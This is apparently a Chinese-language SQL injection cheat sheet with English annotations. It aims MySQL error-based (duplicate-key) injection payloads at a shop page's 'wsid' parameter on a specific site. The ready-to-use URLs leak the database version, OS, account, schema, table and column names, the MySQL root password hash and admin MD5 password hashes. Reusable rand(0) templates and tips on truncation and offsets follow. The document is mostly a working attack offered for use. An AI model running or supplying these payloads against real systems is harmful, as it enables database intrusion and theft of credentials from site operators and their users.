判断版本号 (determine the MySQL version)
说明 / Note: the injection point in every URL below is the `wsid` parameter (`wsid=1 and ...`), not `id`. All payloads are the same MySQL error-based (duplicate-key) technique: `(1,1)>(select count(*),concat(<value>,0x3a,floor(rand()*2)) x from (select 1 union select 2) a group by x limit 1)` makes `group by` collide on the computed key, and the resulting `Duplicate entry '<value>:1' for key 'group_key'` error leaks `<value>` — so it only works when the application echoes MySQL errors. Caveat: unseeded `rand()` is nondeterministic, so the collision (and thus the error) may not fire on every request; repeat the request, or use the seeded `rand(0)` form shown in the 报错注射 section below. MySQL also truncates the duplicated key in the error text (roughly 64 characters), so long values must be read piecewise with `substring()`/`mid()`.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统 (operating system of the database host, via `@@version_compile_os`)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user() (the MySQL account the application connects as — this decides whether the `mysql.user` read below can succeed)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database() (the schema the application is using)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash — 注意 / Note: reading `mysql.user` requires the application's MySQL account to have SELECT on the `mysql` schema (check the `user()` result first). The `Password` column exists only up to MySQL 5.6; on 5.7+ it is `authentication_string`, so this exact payload fails with an unknown-column error there. `char(114,111,111,116)` is just `'root'` spelled without quotes.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名 (enumerate table names: `char(115,97,110,115,97,110,49)` decodes to `sansan1`, and `limit 6,1` returns the 7th table — step the offset to walk the list)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段 (columns of `ecs_admin_user` — `char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)` decodes to that table name; `limit 2,1` returns the 3rd column)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password (same query with `limit 4,1`, i.e. the 5th column)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5) (reads `password` and `user_name` from `sansan1.ecs_admin_user`, joined with `^` = `char(94)`; `limit 0,1` returns the first row — step the offset for further accounts. Because the leaked key is truncated in the error message, a long hash plus user name may be cut off; extract the fields separately if so.)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射 (error-based injection, seeded `rand(0)` variant — deterministic, unlike the unseeded `rand()` payloads above)
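-- Error-based ("double query") MySQL injection templates.
-- Mechanism: the derived table groups rows of information_schema.tables by
-- x = concat(<leaked value>, floor(rand(0)*2)). rand(0) is seeded, so the
-- floor(rand(0)*2) sequence is fixed (0,1,1,0,1,1,...) and the group key
-- repeats, raising "Duplicate entry '<leaked value>1' for key 'group_key'";
-- the value is read from that error text.
-- Preconditions: the application must echo MySQL errors, and the grouped
-- source needs at least three rows for the key to collide (which is why
-- information_schema.tables is used as the row source).
-- The duplicated key is truncated in the error message (roughly 64
-- characters), so longer values must be extracted piecewise with
-- substring()/mid().
-- `table_name`, `uid`, `admin_table` and `username` are placeholders for the
-- target application; the UNION must match the column count of the original
-- SELECT (two columns are assumed here).

-- 1. Leak version().
SELECT *
FROM table_name
WHERE uid = -1
UNION
SELECT 1, (
    SELECT 1
    FROM (
        SELECT count(*),
               concat((SELECT (SELECT version())
                       FROM information_schema.tables
                       LIMIT 0,1),
                      floor(rand(0)*2)) x
        FROM information_schema.tables
        GROUP BY x
        LIMIT 0,1
    ) a
);

-- 2. Same template, leaking the first username from admin_table.
SELECT *
FROM table_name
WHERE uid = -1
UNION
SELECT 1, (
    SELECT 1
    FROM (
        SELECT count(*),
               concat((SELECT (SELECT username FROM admin_table LIMIT 0,1)
                       FROM information_schema.tables
                       LIMIT 0,1),
                      floor(rand(0)*2)) x
        FROM information_schema.tables
        GROUP BY x
        LIMIT 0,1
    ) a
);

-- 3. Fragment appended to an existing numeric WHERE clause (no UNION needed).
--    Leaks the 22nd schema name (LIMIT 21,1); 0x7e/0x27 wrap it as ~'name'~
--    so the value is easy to spot inside the error text. Step the LIMIT offset
--    to enumerate schemas.
and(
    SELECT 1
    FROM (
        SELECT count(*),
               concat((SELECT (SELECT (SELECT concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e)
                                       FROM information_schema.SCHEMATA
                                       LIMIT 21,1))
                       FROM information_schema.tables
                       LIMIT 0,1),
                      floor(rand(0)*2)) x
        FROM information_schema.tables
        GROUP BY x
    ) a
)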